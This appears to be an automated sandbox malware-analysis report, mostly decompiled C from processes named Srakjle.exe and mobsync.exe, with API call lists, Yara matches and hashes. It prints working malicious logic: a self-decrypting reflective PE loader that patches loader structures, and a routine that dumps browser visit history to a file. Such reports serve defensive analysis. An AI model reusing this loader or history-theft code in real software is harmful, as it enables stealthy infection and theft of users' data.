								goto L24;
							}
						} else {
							 *(_t101 + _t90 + 0x19) =  *(_t101 + _t90 + 0x19) | 0x00000010;
							_t54 = _t90 + 0x20; // 0x20
							_t73 = _t54;
							L24:
							 *_t97 = _t73;
						}
						_t68 = _v1828;
						_t96 = _t101 + 0x119;
						_t90 = _t90 + 1;
						__eflags = _t90 - 0x100;
					} while (_t90 < 0x100);
				} else {
					_t74 = 0;
					do {
						 *((char*)(_t102 + _t74 - 0x104)) = _t74;
						_t74 = _t74 + 1;
					} while (_t74 < 0x100);
					_t75 = _v1814;
					_t93 =  &_v1814;
					_v264 = 0x20;
					while(1) {
						_t108 = _t75;
						if(_t75 == 0) {
							break;
						}
						_t95 =  *(_t93 + 1) & 0x000000ff;
						_t76 = _t75 & 0x000000ff;
						while(1) {
							__eflags = _t76 - _t95;
							if(_t76 > _t95) {
								break;
							}
							__eflags = _t76 - 0x100;
							if(_t76 < 0x100) {
								 *((char*)(_t102 + _t76 - 0x104)) = 0x20;
								_t76 = _t76 + 1;
								__eflags = _t76;
								continue;
							}
							break;
						}
						_t93 = _t93 + 2;
						__eflags = _t93;
						_t75 =  *_t93;
					}
					E004493AC(0, _t95, 0x100, _t101, _t108, 0, 1,  &_v264, 0x100,  &_v1800,  *(_t101 + 4), 0);
					L0044480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x100,  &_v264, 0x100,  &_v520, 0x100,  *(_t101 + 4), 0);
					L0044480C(0x100, _t101, _t108, 0,  *((intOrPtr*)(_t101 + 0x21c)), 0x200,  &_v264, 0x100,  &_v776, 0x100,  *(_t101 + 4), 0);
					_t94 = 0;
					do {
						_t86 =  *(_t102 + _t94 * 2 - 0x704) & 0x0000ffff;
						if((_t86 & 0x00000001) == 0) {
							__eflags = _t86 & 0x00000002;
							if((_t86 & 0x00000002) == 0) {
								 *((char*)(_t101 + _t94 + 0x119)) = 0;
							} else {
								_t37 = _t101 + _t94 + 0x19;
								 *_t37 =  *(_t101 + _t94 + 0x19) | 0x00000020;
								__eflags =  *_t37;
								_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x304));
								goto L15;
							}
						} else {
							 *(_t101 + _t94 + 0x19) =  *(_t101 + _t94 + 0x19) | 0x00000010;
							_t87 =  *((intOrPtr*)(_t102 + _t94 - 0x204));
							L15:
							 *((char*)(_t101 + _t94 + 0x119)) = _t87;
						}
						_t94 = _t94 + 1;
					} while (_t94 < 0x100);
				}
				return L0042FD1B(_v8 ^ _t102);
			}































                                    0x00447044
                                    0x0044704f
                                    0x00447056
                                    0x0044705b
                                    0x0044705b
                                    0x00447078
                                    0x00447170
                                    0x00447176
                                    0x00447178
                                    0x00447179
                                    0x00447179
                                    0x0044717b
                                    0x00447181
                                    0x00447181
                                    0x00447183
                                    0x00447185
                                    0x0044718e
                                    0x00447191
                                    0x0044719d
                                    0x004471a4
                                    0x004471b4
                                    0x004471a6
                                    0x004471a6
                                    0x004471a9
                                    0x004471a9
                                    0x004471a9
                                    0x004471ad
                                    0x004471ad
                                    0x00000000
                                    0x004471ad
                                    0x00447193
                                    0x00447193
                                    0x00447198
                                    0x00447198
                                    0x004471b0
                                    0x004471b0
                                    0x004471b0
                                    0x004471b6
                                    0x004471bc
                                    0x004471c2
                                    0x004471c3
                                    0x004471c3
                                    0x0044707e
                                    0x0044707e
                                    0x00447080
                                    0x00447080
                                    0x00447087
                                    0x00447088
                                    0x0044708c
                                    0x00447092
                                    0x00447098
                                    0x004470c0
                                    0x004470c0
                                    0x004470c2
                                    0x00000000
                                    0x00000000
                                    0x004470a1
                                    0x004470a5
                                    0x004470b7
                                    0x004470b7
                                    0x004470b9
                                    0x00000000
                                    0x00000000
                                    0x004470aa
                                    0x004470ac
                                    0x004470ae
                                    0x004470b6
                                    0x004470b6
                                    0x00000000
                                    0x004470b6
                                    0x00000000
                                    0x004470ac
                                    0x004470bb
                                    0x004470bb
                                    0x004470be
                                    0x004470be
                                    0x004470da
                                    0x004470fb
                                    0x00447123
                                    0x0044712b
                                    0x0044712d
                                    0x0044712d
                                    0x00447137
                                    0x00447147
                                    0x00447149
                                    0x00447160
                                    0x0044714b
                                    0x0044714b
                                    0x0044714b
                                    0x0044714b
                                    0x00447150
                                    0x00000000
                                    0x00447150
                                    0x00447139
                                    0x00447139
                                    0x0044713e
                                    0x00447157
                                    0x00447157
                                    0x00447157
                                    0x00447167
                                    0x00447168
                                    0x0044716c
                                    0x004471d7

                                    APIs
                                    • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 00447069
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Info
                                    • String ID: $vuD
                                    • API String ID: 1807457897-1530330280
                                    • Opcode ID: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                                    • Instruction ID: 92fcf1547ebdf66eb0b87621d9a8ff62090b57e6ee7fe94dbbcc2872a12e2c7f
                                    • Opcode Fuzzy Hash: 3f1def9f96a58cc15d1bbc526656efa8d46c329ab04edfec503587d68abf9c7b
                                    • Instruction Fuzzy Hash: 9641F9705082489FEF258E64CC84BF7BBB9DB55308F2404EEE58A87242D3399E46DF65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040414D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E0040414D(void* __ebx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __edi;
				void* _t40;
				struct HINSTANCE__* _t81;
				struct HINSTANCE__* _t84;
				void* _t85;

				_t48 = __ebx;
				_t81 = 0;
				GetModuleFileNameW(0,  &_v692, 0x104);
				E004020D5(__ebx,  &_v52);
				E0041800F( &_v28, 0x30, L00401F95(E00417093( &_v76)));
				L00401FC7();
				L00401F95(0x46c1a0);
				E0041432B(L00401EEB(E004030A6(_t48,  &_v100, E00404429(_t48,  &_v124, E00404405(_t48,  &_v148,  &_v692, 0, E0040427F(__ebx,  &_v172, L" /sort \"Visit Time\" /stext \"")), 0,  &_v28), 0, 0, "\"")));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t84 = 0;
				while(1) {
					_t40 = L00401EEB( &_v28);
					_t80 =  &_v52;
					if(L004179DC(_t40,  &_v52) != 0) {
						break;
					}
					Sleep(0xfa);
					_t84 =  &(_t84->i);
					if(_t84 < 0x14) {
						continue;
					} else {
					}
					L5:
					L00401EF0();
					L00401FC7();
					return _t81;
				}
				E004020EC(_t48, _t85 - 0x18,  &_v52, __eflags,  &_v52);
				_push(0x9d);
				L00404AA4(_t48, 0x46c138, _t80, __eflags);
				_t81 = 1;
				__eflags = 1;
				goto L5;
			}
















                                    0x0040414d
                                    0x00404164
                                    0x00404167
                                    0x00404170
                                    0x0040418a
                                    0x00404193
                                    0x0040419d
                                    0x004041f1
                                    0x004041f9
                                    0x00404201
                                    0x0040420c
                                    0x00404217
                                    0x0040421c
                                    0x0040421e
                                    0x00404221
                                    0x00404226
                                    0x00404232
                                    0x00000000
                                    0x00000000
                                    0x00404239
                                    0x0040423f
                                    0x00404243
                                    0x00000000
                                    0x00000000
                                    0x00404245
                                    0x00404267
                                    0x0040426a
                                    0x00404272
                                    0x0040427e
                                    0x0040427e
                                    0x00404250
                                    0x00404255
                                    0x0040425f
                                    0x00404266
                                    0x00404266
                                    0x00000000

                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404167
                                      • Part of subcall function 00417093: GetCurrentProcessId.KERNEL32(00000000,76D7FBB0,00000000,?,?,?,?,?,0040AEF2,.vbs), ref: 004170BA
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(004041F6,?,004041F6,0045F464), ref: 00414341
                                      • Part of subcall function 0041432B: CloseHandle.KERNEL32(0045F464,?,004041F6,0045F464), ref: 0041434A
                                      • Part of subcall function 004179DC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,00000000,00000000,?,00408D8E), ref: 004179F9
                                    • Sleep.KERNEL32(000000FA,0045F464), ref: 00404239
                                    Strings
                                    • /sort "Visit Time" /stext ", xrefs: 004041B3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                    • String ID: /sort "Visit Time" /stext "
                                    • API String ID: 368326130-1573945896
                                    • Opcode ID: bb8bfcea86a4cc94e3f242122d5bd9489644525cb83876980c6faf47c846c008
                                    • Instruction ID: 7061a5f3a0732a34bedf69b2f97f4882e16be89ee39d0e7819724232ed9fbdaa
                                    • Opcode Fuzzy Hash: bb8bfcea86a4cc94e3f242122d5bd9489644525cb83876980c6faf47c846c008
                                    • Instruction Fuzzy Hash: CB316371A102185BCB14FAB5DC969EE77769F90308F40007FB906775E2EF38194ACA99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040F4FE, Relevance: 5.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 55%
                                    			E0040F4FE(intOrPtr* __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed short* _v20;
				intOrPtr _t41;
				intOrPtr _t44;
				intOrPtr _t46;
				signed short _t57;
				signed int _t58;
				intOrPtr _t59;
				intOrPtr* _t60;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				intOrPtr _t76;
				intOrPtr* _t79;
				intOrPtr _t80;
				void _t81;
				signed short* _t82;
				void* _t87;
				intOrPtr* _t88;
				void* _t89;

				_t88 = __ecx;
				_t87 = 1;
				_t41 =  *__ecx;
				_t68 =  *((intOrPtr*)(__ecx + 4));
				_v12 = _t68;
				if( *((intOrPtr*)(_t41 + 0x84)) != 0) {
					_t64 =  *((intOrPtr*)(_t41 + 0x80)) + _t68;
					if(IsBadReadPtr(_t64, 0x14) == 0) {
						_t66 = _t64 + 0x10;
						while(1) {
							_t44 =  *((intOrPtr*)(_t66 - 4));
							if(_t44 == 0) {
								goto L23;
							}
							_t46 =  *((intOrPtr*)(_t88 + 0x24))(_t44 + _v12,  *((intOrPtr*)(_t88 + 0x34)));
							_v8 = _t46;
							if(_t46 == 0) {
								_push(0x7e);
								goto L22;
							} else {
								_push(4 +  *(_t88 + 0xc) * 4);
								_push( *((intOrPtr*)(_t88 + 8)));
								_t80 = L0043AE34();
								if(_t80 == 0) {
									 *((intOrPtr*)(_t88 + 0x2c))(_v8,  *((intOrPtr*)(_t88 + 0x34)));
									_push(0xe);
									L22:
									SetLastError();
									_t87 = 0;
								} else {
									 *((intOrPtr*)(_t88 + 8)) = _t80;
									 *((intOrPtr*)(_t80 +  *(_t88 + 0xc) * 4)) = _v8;
									 *(_t88 + 0xc) =  *(_t88 + 0xc) + 1;
									_t81 =  *(_t66 - 0x10);
									if(_t81 == 0) {
										_t81 =  *_t66;
									}
									_t82 = _t81 + _v12;
									_t76 = _v8;
									_v16 =  *_t66 + _v12;
									_v20 = _t82;
									if( *_t82 != 0) {
										while(1) {
											_t57 =  *_t82;
											_push( *((intOrPtr*)(_t88 + 0x34)));
											if(_t57 >= 0) {
												_t58 = _t57 + _v12 + 2;
											} else {
												_t58 = _t57 & 0x0000ffff;
											}
											_t59 =  *((intOrPtr*)(_t88 + 0x28))(_t76, _t58);
											_t79 = _v16;
											_t89 = _t89 + 0xc;
											 *_t79 = _t59;
											_t60 = _t79;
											_t76 = _v8;
											if( *_t60 == 0) {
												break;
											}
											_t82 =  &(_v20[2]);
											_v16 = _t60 + 4;
											_v20 = _t82;
											if( *_t82 != 0) {
												continue;
											} else {
											}
											goto L16;
										}
										_t87 = 0;
									}
									L16:
									if(_t87 == 0) {
										 *((intOrPtr*)(_t88 + 0x2c))(_t76,  *((intOrPtr*)(_t88 + 0x34)));
										SetLastError(0x7f);
									} else {
										_t66 = _t66 + 0x14;
										if(IsBadReadPtr(_t66 - 0x10, 0x14) == 0) {
											continue;
										} else {
										}
									}
								}
							}
							goto L23;
						}
					}
					L23:
				}
				return _t87;
			}

























                                    0x0040f505
                                    0x0040f50a
                                    0x0040f50b
                                    0x0040f50d
                                    0x0040f510
                                    0x0040f51a
                                    0x0040f527
                                    0x0040f534
                                    0x0040f53a
                                    0x0040f53d
                                    0x0040f53d
                                    0x0040f542
                                    0x00000000
                                    0x00000000
                                    0x0040f54f
                                    0x0040f552
                                    0x0040f559
                                    0x0040f630
                                    0x00000000
                                    0x0040f55f
                                    0x0040f569
                                    0x0040f56a
                                    0x0040f572
                                    0x0040f578
                                    0x0040f627
                                    0x0040f62c
                                    0x0040f632
                                    0x0040f632
                                    0x0040f638
                                    0x0040f57e
                                    0x0040f584
                                    0x0040f587
                                    0x0040f58a
                                    0x0040f58d
                                    0x0040f592
                                    0x0040f594
                                    0x0040f594
                                    0x0040f596
                                    0x0040f59e
                                    0x0040f5a4
                                    0x0040f5a7
                                    0x0040f5aa
                                    0x0040f5ac
                                    0x0040f5ac
                                    0x0040f5ae
                                    0x0040f5b3
                                    0x0040f5c0
                                    0x0040f5b5
                                    0x0040f5b5
                                    0x0040f5b5
                                    0x0040f5c4
                                    0x0040f5c7
                                    0x0040f5ca
                                    0x0040f5cd
                                    0x0040f5cf
                                    0x0040f5d1
                                    0x0040f5d7
                                    0x00000000
                                    0x00000000
                                    0x0040f5df
                                    0x0040f5e2
                                    0x0040f5e5
                                    0x0040f5eb
                                    0x00000000
                                    0x00000000
                                    0x0040f5ed
                                    0x00000000
                                    0x0040f5eb
                                    0x0040f5ef
                                    0x0040f5ef
                                    0x0040f5f1
                                    0x0040f5f3
                                    0x0040f612
                                    0x0040f619
                                    0x0040f5f5
                                    0x0040f5f5
                                    0x0040f606
                                    0x00000000
                                    0x00000000
                                    0x0040f60c
                                    0x0040f606
                                    0x0040f5f3
                                    0x0040f578
                                    0x00000000
                                    0x0040f559
                                    0x0040f53d
                                    0x0040f63a
                                    0x0040f63a
                                    0x0040f642

                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014,00000001,00000000,?,?,?,?,0040F89B), ref: 0040F52C
                                    • IsBadReadPtr.KERNEL32(?,00000014,?,0040F89B), ref: 0040F5FE
                                    • SetLastError.KERNEL32(0000007F), ref: 0040F619
                                    • SetLastError.KERNEL32(0000007E,?,0040F89B), ref: 0040F632
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                                    • Instruction ID: 276675e80245dda8867d672efd476c996cb1fc0ae7fab6a88f5e1639ff5a30e1
                                    • Opcode Fuzzy Hash: dbeb3da561d95d77c32e75e82459f6f19270ad197ccf04568eae6f8e0ed74529
                                    • Instruction Fuzzy Hash: B3419B71A00204EFDB24CF58CC44B6AB7F5FF44711F14887AE446A7A91E739E906DB18
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: Srakjle.exe PID: 7144 Parent PID: 3292 Srakjle.exeCOMMON

                                    Executed Functions

                                    Non-executed Functions

                                    Function 03B80B99, Relevance: .0, Instructions: 13COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000017.00000003.331163599.0000000003B30000.00000004.00000001.sdmp, Offset: 03B30000, based on PE: false
                                    • Associated: 00000017.00000003.356302900.0000000003B30000.00000004.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e220fd88640a154cd486b6824542d8122b44cc7edd1d44cacc1ee9228cfd0c0
                                    • Instruction ID: 6a047a9ca4705df98baf1edc52f620b26e9a8fd01948664796e2ae8fcb4b94f2
                                    • Opcode Fuzzy Hash: 5e220fd88640a154cd486b6824542d8122b44cc7edd1d44cacc1ee9228cfd0c0
                                    • Instruction Fuzzy Hash: FBB0123E1CE2B42EF315592C75676E31F919785754D10504EF3E28B3B36DCAC48626E0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Analysis Process: mobsync.exe PID: 4868 Parent PID: 7144 mobsync.exeCOMMON

                                    Executed Functions

                                    Function 0070CB4E, Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(0000000C,?,0070CB24,0000000C,00738188,0000000C), ref: 0070CB6F
                                    • TerminateProcess.KERNEL32(00000000,?,0070CB24,0000000C,00738188,0000000C), ref: 0070CB76
                                    • ExitProcess.KERNEL32 ref: 0070CB88
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Process$CurrentExitTerminate
                                    • String ID:
                                    • API String ID: 1703294689-0
                                    • Opcode ID: ecdeda74f62463ef14bb1ea4e5f22c91c1280216bfdb398ad4a614c87f675096
                                    • Instruction ID: 2a14e1e5554d4bf3acd624053420b9f3110113bc46fa07dec51b4b092e7e3717
                                    • Opcode Fuzzy Hash: ecdeda74f62463ef14bb1ea4e5f22c91c1280216bfdb398ad4a614c87f675096
                                    • Instruction Fuzzy Hash: D9E09A71000508EBCF126B68D90A9593FA9FB55351F148218F9058A162CB3D9956CA54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 1059111E, Relevance: 1.9, APIs: 1, Instructions: 353libraryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 18%
                                    			E1059111E(signed int __eax, void* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				char _v60;
				intOrPtr* _v64;
				signed int* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr* _v116;
				struct HINSTANCE__* _v120;
				struct HINSTANCE__* _v124;
				struct HINSTANCE__* _v128;
				char _v136;
				char _v140;
				intOrPtr _v148;
				char _v160;
				intOrPtr _v380;
				intOrPtr _v428;
				intOrPtr _v468;
				char _v508;
				void* __ebp;
				signed int _t111;
				void* _t114;
				struct HINSTANCE__* _t116;
				intOrPtr _t121;
				void* _t122;
				void* _t127;
				intOrPtr _t129;
				intOrPtr* _t131;
				void* _t134;
				void* _t138;
				void* _t142;
				intOrPtr _t146;
				void* _t151;
				unsigned int _t153;
				void* _t155;
				void* _t156;
				unsigned int _t158;
				struct HINSTANCE__* _t160;
				intOrPtr _t161;
				intOrPtr* _t162;
				intOrPtr* _t163;
				intOrPtr _t166;
				intOrPtr* _t167;
				void* _t169;
				signed int* _t170;
				signed int _t172;
				intOrPtr _t174;
				void* _t175;
				signed int _t180;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t197;
				unsigned int _t199;
				intOrPtr _t202;
				void* _t203;
				signed int _t204;
				signed int _t207;
				void* _t216;
				void* _t225;
				void* _t226;
				void* _t229;
				void* _t233;
				void* _t236;
				intOrPtr _t239;
				void* _t240;
				void* _t241;
				struct HINSTANCE__* _t243;
				void* _t251;
				void* _t254;
				void* _t255;
				void* _t257;
				intOrPtr* _t258;
				intOrPtr* _t260;
				void* _t261;
				intOrPtr* _t264;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;

				_v84 = __eax & 0xffff0000;
				_push(_a4);
				_pop(_t169);
				_t170 = _t169 + 0x72b10;
				_t251 = 0x72b10;
				_t111 = 0x4a68ea1;
				do {
					_t251 = _t251 - 4;
					_t170 = _t170 - 4;
					asm("rol edi, 0x81");
					asm("rol edi, 0x4");
					_t216 =  !( *_t170 - _t111) + _t111;
					asm("bswap edi");
					_t111 = _t111 - 0xb4e3e448;
					asm("bswap edi");
					asm("bswap edi");
					 *_t170 = ( ~(_t216 + _t251 + _t251) + _t111 - 0xad18deb5 ^ _t111) - _t111 ^ _t111;
				} while (_t251 != 0);
				E105914E3(_t111);
				_t114 =  *_a12(_t267, 0x6e72656b, 0x32336c65, 0x6c6c642e, 0);
				_t268 = _t267 + 0x10;
				_t225 = _t114;
				_t116 =  *_a8(_t114, _t268, 0x74726956, 0x416c6175, 0x636f6c6c, 0);
				_t269 = _t268 + 0x10;
				_t160 = _t116;
				if(_t116 == 0) {
					L62:
					return _t116;
				}
				_t116 =  *_a8(_t225, _t269, 0x74726956, 0x506c6175, 0x65746f72, 0x7463);
				_t270 = _t269 + 0x10;
				_v120 = _t116;
				if(_t116 == 0) {
					goto L62;
				}
				_t116 =  *_a8(_t225, _t270, 0x74726956, 0x516c6175, 0x79726575, 0);
				_t271 = _t270 + 0x10;
				_v124 = _t116;
				if(_t116 == 0) {
					goto L62;
				}
				_t116 =  *_a8(_t225, _t271, 0x61427349, 0x61655264, 0x72745064, 0);
				_t272 = _t271 + 0x10;
				_v128 = _t116;
				if(_t116 == 0) {
					goto L62;
				}
				_t226 =  &_v508;
				_t172 = 0x3e;
				memcpy(_t226, _a4 +  *((intOrPtr*)(_a4 + 0x3c)), _t172 << 2);
				_t273 = _t272 + 0xc;
				_t229 = _t226;
				_t121 =  *((intOrPtr*)(_t229 + 0x34));
				_v8 = _t121;
				_t174 =  *((intOrPtr*)(_t229 + 0x50));
				_v12 = _t174;
				_t122 = _t160->i(_t174, 0x3000, 0x40, _t174);
				_t175 = _t121;
				if(_t122 != 0) {
					L8:
					_v16 = _t122;
					_t254 = _a4;
					memcpy(_t122, _t254,  *(_t254 +  *((intOrPtr*)(_t254 + 0x3c)) + 0x54));
					_t274 = _t273 + 0xc;
					_t255 = _t254;
					_t257 = _t255 +  *((intOrPtr*)(_t255 + 0x3c)) + 0xf8;
					do {
						_t233 =  &_v60;
						_t180 = 0xa;
						_t127 = memcpy(_t233, _t257, _t180 << 2);
						_t274 = _t274 + 0xc;
						_t236 = _t233;
						_t197 =  *((intOrPtr*)(_t236 + 0x14));
						if(_t197 != 0) {
							_t127 = memcpy(_v16 +  *((intOrPtr*)(_t236 + 0xc)), _a4 + _t197,  *(_t236 + 0x10));
							_t274 = _t274 + 0xc;
							_t257 = _t257;
						}
					} while (_t127 != 1);
					_t199 = _v16 - _v8;
					if(_t199 == 0) {
						L24:
						_t182 = _v16;
						_v80 = _v80 + _v84;
						_t129 =  *[fs:0x30];
						if(_v72 == 0) {
							 *((intOrPtr*)(_t129 + 8)) = _t182;
						}
						_t131 =  *((intOrPtr*)( *((intOrPtr*)(_t129 + 0xc)) + 0xc));
						_t258 = _t131;
						while( *((intOrPtr*)(_t131 + 0x18)) != _v84 ||  *((intOrPtr*)(_t131 + 0x1c)) != _v80 ||  *((intOrPtr*)(_t131 + 0x20)) != _v76) {
							if( *_t131 == _t258) {
								L33:
								_t161 = _v380;
								if(_t161 == 0) {
									L46:
									_t162 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
									_v116 = _t162;
									do {
										_t202 =  *((intOrPtr*)(_t162 + 0x18));
										if(_t202 == _v84) {
											goto L60;
										}
										_t134 = _v128(4, _t202);
										_t203 = _t202;
										if(_t134 != 0) {
											goto L60;
										}
										_t239 =  *((intOrPtr*)(_t203 +  *((intOrPtr*)(_t203 + 0x3c)) + 0x80));
										if(_t239 == 0) {
											goto L60;
										}
										_t240 = _t239 + _t203;
										while(1) {
											_push(_t240);
											asm("repe scasd");
											_t241 = 5;
											if(0 == 0) {
												goto L60;
											}
											_t260 =  *((intOrPtr*)(_t241 + 0x10)) +  *((intOrPtr*)(_t162 + 0x18));
											_t138 =  *_t260 - _v84;
											if(_t138 < 0 || _t138 > _v76) {
												L54:
												_t240 = _t241 + 0x14;
												continue;
											} else {
												_v124(_t260,  &_v160, 0x1c);
												_t142 = _v120(_v160, _v148, 4,  &_v140);
												if(_t142 == 0) {
													goto L60;
												}
												_push(_t241);
												while(1) {
													asm("lodsd");
													if(_t142 == 0) {
														break;
													}
													_t142 = _t142 - _v84 + _v16;
													asm("stosd");
												}
												_v120(_v160, _v148, _v140,  &_v136);
												_pop(_t241);
												goto L54;
											}
										}
										L60:
										_t162 =  *_t162;
									} while (_t162 != _v116);
									_t116 = _v468 + _v16;
									goto L62;
								}
								_t261 = _v16;
								_t163 = _t161 + _t261;
								while(1) {
									_t146 =  *((intOrPtr*)(_t163 + 0xc));
									if(_t146 == 0) {
										goto L46;
									}
									_v64 =  *((intOrPtr*)(_t163 + 0x10)) + _t261;
									_t186 =  *_t163;
									if(_t186 == 0) {
										_t186 =  *((intOrPtr*)(_t163 + 0x10));
									}
									_v68 = _t186 + _t261;
									_t116 = LoadLibraryA(_t146 + _t261); // executed
									if(_t116 == 0) {
										goto L62;
									} else {
										_t243 = _t116;
										while(1) {
											_t204 =  *_v68;
											if(_t204 == 0) {
												break;
											}
											if((_t204 & 0x80000000) == 0) {
												_t207 = _t204 + _t261 + 2;
											} else {
												_t207 = _t204 & 0x7fffffff;
											}
											 *_v64 =  *_a8(_t243, _t207);
											_v64 = _v64 + 4;
											_v68 =  &(_v68[1]);
										}
										_t163 = _t163 + 0x14;
										continue;
									}
								}
								goto L46;
							}
							_t131 =  *_t131;
						}
						 *((intOrPtr*)(_t131 + 0x18)) = _t182;
						 *((intOrPtr*)(_t131 + 0x1c)) = _t182 + _v468;
						 *((intOrPtr*)(_t131 + 0x20)) = _v428;
						goto L33;
					}
					_t151 = _v16;
					_t166 =  *((intOrPtr*)(_t151 +  *((intOrPtr*)(_t151 + 0x3c)) + 0xa0));
					if(_t166 == 0) {
						goto L24;
					}
					_t167 = _t166 + _t151;
					while( *((intOrPtr*)(_t167 + 4)) != 0) {
						_t153 =  *(_t167 + 8) & 0x0000ffff;
						_t264 = _v16 +  *_t167 + (_t153 & 0x00000fff);
						_t199 = _t199;
						_t155 = (_t153 >> 0xc) - 1;
						if(_t155 != 0) {
							_t156 = _t155 - 1;
							if(_t156 != 0) {
								if(_t156 == 1) {
									 *_t264 =  *_t264 + _t199;
								}
								L23:
								asm("loop 0xffffffce");
								_t167 = _t167 +  *((intOrPtr*)(_t167 + 4));
								continue;
							}
							_t158 = _t199 & 0x0000ffff;
							L20:
							 *_t264 =  *_t264 + _t158;
							goto L23;
						}
						_t158 = _t199 >> 0x10;
						goto L20;
					}
					goto L24;
				}
				_t116 = _t160->i(_t122, _t175, 0x1000, 0x40);
				if(_t116 == 0) {
					goto L62;
				}
				goto L8;
			}

























































































                                    0x1059112f
                                    0x10591137
                                    0x1059113a
                                    0x1059113b
                                    0x10591146
                                    0x1059114b
                                    0x10591150
                                    0x10591150
                                    0x10591153
                                    0x1059115c
                                    0x1059115f
                                    0x10591162
                                    0x10591164
                                    0x10591166
                                    0x1059116c
                                    0x1059117c
                                    0x10591184
                                    0x10591186
                                    0x1059118e
                                    0x105911a8
                                    0x105911aa
                                    0x105911ad
                                    0x105911c5
                                    0x105911c7
                                    0x105911ca
                                    0x105911ce
                                    0x105914d9
                                    0x105914e0
                                    0x105914e0
                                    0x105911ed
                                    0x105911ef
                                    0x105911f2
                                    0x105911f7
                                    0x00000000
                                    0x00000000
                                    0x10591213
                                    0x10591215
                                    0x10591218
                                    0x1059121d
                                    0x00000000
                                    0x00000000
                                    0x10591239
                                    0x1059123b
                                    0x1059123e
                                    0x10591243
                                    0x00000000
                                    0x00000000
                                    0x10591249
                                    0x10591258
                                    0x10591259
                                    0x10591259
                                    0x1059125b
                                    0x1059125c
                                    0x1059125f
                                    0x10591262
                                    0x10591265
                                    0x10591272
                                    0x10591274
                                    0x10591277
                                    0x1059128c
                                    0x1059128c
                                    0x10591291
                                    0x1059129d
                                    0x1059129d
                                    0x1059129f
                                    0x105912a3
                                    0x105912b3
                                    0x105912b3
                                    0x105912b9
                                    0x105912ba
                                    0x105912ba
                                    0x105912bc
                                    0x105912bd
                                    0x105912c2
                                    0x105912d5
                                    0x105912d5
                                    0x105912d7
                                    0x105912d7
                                    0x105912d8
                                    0x105912de
                                    0x105912e1
                                    0x1059133f
                                    0x1059133f
                                    0x10591345
                                    0x10591348
                                    0x10591353
                                    0x10591355
                                    0x10591355
                                    0x1059135b
                                    0x1059135e
                                    0x10591360
                                    0x10591391
                                    0x10591397
                                    0x10591397
                                    0x1059139f
                                    0x1059140d
                                    0x10591417
                                    0x1059141a
                                    0x1059141d
                                    0x1059141d
                                    0x10591423
                                    0x00000000
                                    0x00000000
                                    0x1059142d
                                    0x10591430
                                    0x10591433
                                    0x00000000
                                    0x00000000
                                    0x1059143e
                                    0x10591446
                                    0x00000000
                                    0x00000000
                                    0x10591448
                                    0x1059144a
                                    0x1059144c
                                    0x10591450
                                    0x10591452
                                    0x10591453
                                    0x00000000
                                    0x00000000
                                    0x10591458
                                    0x1059145d
                                    0x10591460
                                    0x10591467
                                    0x10591467
                                    0x00000000
                                    0x1059146c
                                    0x10591476
                                    0x1059148e
                                    0x10591493
                                    0x00000000
                                    0x00000000
                                    0x10591495
                                    0x10591498
                                    0x10591498
                                    0x1059149b
